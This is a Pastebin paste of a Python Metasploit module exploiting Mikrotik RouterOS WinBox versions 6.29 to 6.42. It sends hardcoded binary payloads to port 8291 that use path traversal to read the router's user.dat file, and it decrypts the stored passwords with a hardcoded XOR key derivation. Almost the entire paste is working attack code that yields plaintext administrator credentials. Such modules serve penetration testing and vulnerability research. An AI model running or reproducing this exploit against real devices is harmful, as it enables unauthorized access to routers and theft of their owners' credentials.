API tools faq
paste
Advertisement
Guest User

expl_mk

a guest
Oct 21st, 2018
205
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.57 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python3
  2. # Exploit Title: Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)
  3. # Date: 2018-05-21
  4. # Exploit Author(s): Omid Shojaei (@Dmitriy_area51), Dark VoidSeeker, Alireza Mosajjal
  5. # Vendor Page: https://www.mikrotik.com/
  6. # Sotware Link: https://mikrotik.com/download
  7. # Version: 6.29 - 6.42
  8. # Tested on: Metasploit Framework: 4.16.58-dev on Kali Linux
  9. # CVE: N/A
  10.  
  11.  
  12. import sys
  13. import socket
  14. import hashlib
  15. import logging
  16.  
  17. from metasploit import module
  18.  
  19. FIRST_PAYLOAD = \
  20. [0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
  21. 0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
  22. 0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
  23. 0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,
  24. 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,
  25. 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,
  26. 0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,
  27. 0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,
  28. 0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,
  29. 0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,
  30. 0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
  31. 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
  32. 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
  33. 0x00, 0x00]
  34.  
  35.  
  36. SECOND_PAYLOAD = \
  37. [0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
  38. 0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
  39. 0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,
  40. 0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
  41. 0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
  42. 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
  43. 0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
  44. 0x00, 0x02, 0x00, 0x00, 0x00]
  45.  
  46.  
  47. METADATA = {
  48. "name": "Mikrotik RouterOS WinBox Credentials Leakage",
  49. "description": '''
  50. This module extracts winbox credentials in
  51. winbox releases prior to 04/20/2018
  52. ''',
  53. "authors": [
  54. "Omid Shojaei (@Dmitriy_area51)",
  55. "Dark VoidSeeker",
  56. "Alireza Mosajjal" # Original author
  57. ],
  58. "date": "2018-05-21",
  59. "license": "MSF_LICENSE",
  60. "references": [
  61. {"type": "url", "ref": "https://github.com/BigNerd95/WinboxExploit"}
  62. ],
  63. "type": "single_scanner",
  64. "options": {
  65. "RHOSTS": {
  66. "type": "address",
  67. "description": "The Mikrotik device to extract credentials (Just 1 IP)",
  68. "required": True,
  69. "default": None
  70. },
  71. "RPORT": {
  72. "type": "string",
  73. "description": "The Mikrotik device's winbox port number.",
  74. "required": True,
  75. "default": 8291
  76. }
  77. }}
  78.  
  79. def decrypt_password(user, pass_enc):
  80. key = hashlib.md5(user + b"283i4jfkai3389").digest()
  81.  
  82. passw = ""
  83. for i in range(0, len(pass_enc)):
  84. passw += chr(pass_enc[i] ^ key[i % len(key)])
  85.  
  86. return passw.split("\x00")[0]
  87.  
  88. def extract_user_pass_from_entry(entry):
  89. user_data = entry.split(b"\x01\x00\x00\x21")[1]
  90. pass_data = entry.split(b"\x11\x00\x00\x21")[1]
  91.  
  92. user_len = user_data[0]
  93. pass_len = pass_data[0]
  94.  
  95. username = user_data[1:1 + user_len]
  96. password = pass_data[1:1 + pass_len]
  97.  
  98. return username, password
  99.  
  100. def get_pair(data):
  101.  
  102. user_list = []
  103.  
  104. entries = data.split(b"M2")[1:]
  105. for entry in entries:
  106. try:
  107. user, pass_encrypted = extract_user_pass_from_entry(entry)
  108. except:
  109. continue
  110.  
  111. pass_plain = decrypt_password(user, pass_encrypted)
  112. user = user.decode("ascii")
  113.  
  114. user_list.append((user, pass_plain))
  115.  
  116. return user_list
  117.  
  118. def dump(data, rhost):
  119. user_pass = get_pair(data)
  120. for user, passwd in user_pass:
  121. logging.info("{}:{}".format(user, passwd))
  122. module.report_correct_password(user, passwd, host=rhost)
  123.  
  124. def run(args):
  125. module.LogHandler.setup(msg_prefix="[{}] - ".format(args['rhost']))
  126.  
  127. #Initialize Socket
  128. s = socket.socket()
  129. s.settimeout(3)
  130. try:
  131. s.connect((str(args['RHOSTS']), int(args['RPORT'])))
  132. except socket.timeout:
  133. logging.error("Not Vulnerable!!!")
  134. return
  135.  
  136. #Convert to bytearray for manipulation
  137. a = bytearray(FIRST_PAYLOAD)
  138. b = bytearray(SECOND_PAYLOAD)
  139.  
  140. #Send hello and recieve the sesison id
  141. s.send(a)
  142. d = bytearray(s.recv(1024))
  143.  
  144. #Replace the session id in template
  145. b[19] = d[38]
  146.  
  147. #Send the edited response
  148. s.send(b)
  149. d = bytearray(s.recv(1024))
  150.  
  151. #Get results
  152. module.report_host(args['RHOSTS'])
  153. dump(d[55:], args['RHOSTS'])
  154.  
  155. if __name__ == "__main__":
  156. module.run(METADATA, run)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!